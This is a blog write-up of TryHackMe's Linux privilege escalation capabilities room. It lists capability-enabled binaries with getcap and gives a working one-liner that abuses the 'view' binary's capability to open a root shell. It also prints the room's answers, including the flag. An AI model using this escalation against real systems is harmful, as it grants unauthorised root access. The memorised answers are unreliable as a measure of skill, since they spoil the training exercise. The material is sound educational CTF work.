TryHackMe - Linux Privilege Escalation: Capabilities

TryHackMe - Linux Privilege Escalation: Capabilities

This article discusses the solution for TryHackMe's Linux Privilege Escalation Capabilities task so proceed with caution.

I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.

Privilege Escalation Capabilities Solution

Capabilities which are used to grant specific privileges to process or entities can be used for privilege escalation. These are directly associated with process or objects, allowing for finer-grained control over access.

How many binaries have set capabilities?

  1. Run the following command to list enabled capabilities

getcap -r / 2>/dev/null

Screenshot 2024-02-08 at 1 16 42 AM

Answer: 6

What other binary can be used through its capabilities?

  1. Go to GTFO to check which binaries can be exploited via capabilities

  2. From GTFO we can see that from the list of enabled capabilities (see above) view can be used.

Answer: view

What is the content of the flag4.txt file?

  1. Execute the following command based from GTFO. Don't forget to prepend py3 as py is not supported for the machine.
cp $(which view) .
./view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
  1. Exit vim

  2. Run cat /home/ubuntu/flag4.txt

Screenshot 2024-02-08 at 9 47 18 PM

Answer: THM-9349843

Until next time. Keep learning.

Stay stoked and code. :)

I hope you can voluntarilyBuy Me A Coffeeif you found this article useful and give additional support for me to continue sharing more content for the community. :)

Thank you very much. :)